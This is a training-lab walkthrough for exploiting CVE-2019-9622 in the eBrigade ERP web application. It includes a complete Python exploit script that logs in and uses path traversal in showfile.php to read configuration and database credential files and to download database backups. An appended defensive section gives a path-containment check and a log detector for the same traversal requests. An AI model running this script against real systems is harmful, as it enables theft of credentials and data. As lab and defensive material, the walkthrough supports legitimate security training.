Walkthrough 1357

The document describes how to exploit CVE-2019-9622 in an eBrigade ERP web application. It involves 4 steps: 1) inspecting the web app, 2) searching for exploits of the vulnerability online, 3) modifying a Python script to include the correct credentials, and 4) running the script against the target URL to allow arbitrary file downloading. The vulnerability allows an attacker to download files from the webroot directory.

Uploaded by Adrian Dolbuck

Name CVE-2019-9622

URL https://attackdefense.com/challengedetails?cid=1357

Type Webapp CVEs : 2019

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Solution:

The web application is vulnerable to CVE-2019-9622.

Step 1: Inspect the web application.


Step 2: Search Google for “CVE-2019-9622”.
The Exploit-DB entry contains the script that can be used to exploit the vulnerability.

Exploit DB Link: https://www.exploit-db.com/exploits/46109

Step 3: The user credentials must be set in the Python script. Update the
credentials in the script. The login credentials of the web application are provided in the
challenge description.

● Username: 1234
● Password: 1234

Modified Python script:

#!/usr/bin/python
# Python 2 script (print statements, raw_input, cookielib, urllib2); run with python2.

import mechanize, sys, cookielib, requests
import colorama, urllib, re, random, urllib2
import wget
from colorama import Fore
from tqdm import tqdm
from pathlib import Path

def bannerche():
    print '''
@-------------------------------------------------------------@
| eBrigade ERP <= 4.5 - Database Backup Disclosure via AFD    |
| Vulnerability discovered by AkkuS                           |
| My Blog - https://pentest.com.tr                            |
@-------------------------------------------------------------@
'''
bannerche()

if (len(sys.argv) != 2):
    print "[*] Usage: exploit.py http://127.0.0.1/"
    exit(0)

rhost = sys.argv[1]
UserName = "1234" # Administrator/User Username Input
Password = "1234" # Administrator/User Password Input

print(Fore.BLUE + "+ [*] Getting login permission...")

br = mechanize.Browser() # set cookies
br.set_handle_robots(False)
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

br.open(rhost+"/") # User Access Login

assert br.viewing_html()
br.select_form(nr=0)
br.form['id'] = UserName
br.form['pwd'] = Password
br.submit()

##
# Login Access and Version Control
##

LoginControl = requests.get(rhost+"/index_d.php", cookies=cj)
HTMLdata = LoginControl.text

finder = re.findall(r'version<b> 4.5', HTMLdata)

try:
    version = finder[0].replace('"','').replace('<b>','').strip()
except IndexError:
    pass
try:
    if version == "version 4.5":
        print (Fore.GREEN + "+ [*] Login successful")
except NameError:
    # version is undefined when the version string was not found after login
    print (Fore.RED + "+ [*] User information is incorrect or version incompatible")

##
# Introducing Cookie and CSRF token information
##

print (Fore.BLUE + "+ [*] Select Exploit Type:")
print (Fore.YELLOW +"- [*] 1 - Arbitrary File Download/Read (Ex: /conf/sql.php)")
print ("- [*] 2 - Database Backup File Download")
choice = int(raw_input("- [*] Enter a number (1 or 2) : "))

if choice == 1:
    print (Fore.BLUE + "+ [*] Select the file you want to Download/Read:")
    print (Fore.YELLOW + "- [*] 1 - /conf/sql.php")
    print ("- [*] 2 - /config.php")
    print ("- [*] 3 - /.htaccess.template")
    print ("- [*] 4 - Manual exploitation")
    AFDc = int(raw_input("- [*] Enter a number : "))
    if AFDc == 1:
        AFD1 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../conf/sql.php", cookies=cj)
        print AFD1.text
    elif AFDc == 2:
        AFD2 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../config.php", cookies=cj)
        print AFD2.text
    elif AFDc == 3:
        AFD3 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../.htaccess.template", cookies=cj)
        print AFD3.text
    elif AFDc == 4:
        print (Fore.RED +"- [!] You must have knowledge of files and directories")
        AFDmc = str(raw_input(Fore.BLUE + "+ [*] Enter file name (Ex: /lib/PHPMailer/class.smtp.php) : "))
        AFD4 = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../.."+AFDmc+"", cookies=cj)
        if AFD4.status_code == 200:
            try:
                mdata = AFD4.text
                Le = re.findall(r'javascript:history.back', mdata)
                LeClean = Le[0].replace('"','').strip()
                if LeClean == "javascript:history.back":
                    print (Fore.RED + "+ [X] The directory and file name you entered could not be found or incorrect")
            except IndexError:
                # no "history.back" error page in the response: print the returned file
                print AFD4.text
        else:
            print (Fore.RED + "+ [X] Unable to access file")
            sys.exit()
    else:
        print("Invalid input!")
elif choice == 2:
    backupfiles = requests.get(rhost+"/restore.php?file=", cookies=cj)
    RecentesData = backupfiles.text
    finder = re.findall(r'a href=".*"', RecentesData)
    names = finder[0].replace('"','').replace('javascript:deletefile','').replace('a href=javascript:restore','').replace('save','').replace("'",'').replace('(','').replace(')','').replace(',','').strip()
    print ("+ [*] Backup File Name : " + names)

    DB = requests.get(rhost+"/showfile.php?section=0&pompier=1&file=../../../user-data/save/"+names+"", cookies=cj)

    with open(names, "wb") as handle:
        for data in tqdm(DB.iter_content()):
            handle.write(data)

    p = str(Path.cwd())
    print(Fore.GREEN + "+ [*] Backup successfully downloaded. Directory path : " + p + "/" + names)
else:
    print("Invalid input!")

# end
Save the Python script as “exploit.py”.

Step 4: Run the Python script with the URL of the target as the argument.

Command: python2 exploit.py "http://oicbicw6kg7ppwdqatolmez67.stager3.attackdefenselabs.com"

The vulnerability allows an attacker to download any file present inside the webroot
directory.
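As an added, defender-side example (not part of this walkthrough or of the exploit script above), the following Python 3 code shows the path-containment check that the vulnerable showfile.php endpoint lacks, and a detector that flags the request pattern the script sends in constructed access-log lines; the webroot path and the log lines are constructed, not taken from the lab.

```python
# Added example, not from the walkthrough or from eBrigade. The request shape
# (showfile.php with a "file" parameter carrying ../ sequences) matches the
# script above; the webroot path and log lines below are constructed.
import os
from urllib.parse import urlsplit, parse_qs, unquote

def safe_resolve(webroot, requested):
    """Return the absolute path for `requested` only if it stays under webroot.
    Join, canonicalise (collapses ../ and symlinks), then compare against the
    canonical webroot prefix. Returns None for any escape attempt."""
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, requested.lstrip("/\\")))
    if candidate == root or candidate.startswith(root + os.sep):
        return candidate
    return None

def is_traversal_request(log_line):
    """Flag an access-log line that hits showfile.php with a traversing `file`.
    Assumes the common log format (request line is the first quoted field).
    Decodes twice so %252e%252e-style double encoding is caught as well."""
    try:
        request = log_line.split('"')[1]        # 'GET /showfile.php?... HTTP/1.1'
        path = request.split(" ")[1]
    except IndexError:
        return False
    parts = urlsplit(path)
    if not parts.path.endswith("/showfile.php"):
        return False
    for value in parse_qs(parts.query).get("file", []):
        decoded = unquote(unquote(value)).replace("\\", "/")
        if ".." in decoded.split("/"):
            return True
    return False

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /showfile.php?section=0&pompier=1&file=../../../conf/sql.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /showfile.php?section=0&pompier=1&file=..%252F..%252Fconfig.php HTTP/1.1" 200 300',
    '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /showfile.php?section=0&pompier=1&file=report.pdf HTTP/1.1" 200 9000',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index_d.php HTTP/1.1" 200 2048',
]

def suspicious_lines(lines=SAMPLE_LOG):
    """Return the log lines that carry a traversal attempt against showfile.php."""
    return [line for line in lines if is_traversal_request(line)]
```

Only the two lines from 10.0.0.5 are flagged: the plain `../../../conf/sql.php` request and the double-encoded variant, while the legitimate `report.pdf` fetch and the unrelated page load pass.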

References:

1. eBrigade (https://ebrigade.net/)
2. CVE-2019-9622 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9622)
3. eBrigade ERP 4.5 - Arbitrary File Download (https://www.exploit-db.com/exploits/46109)
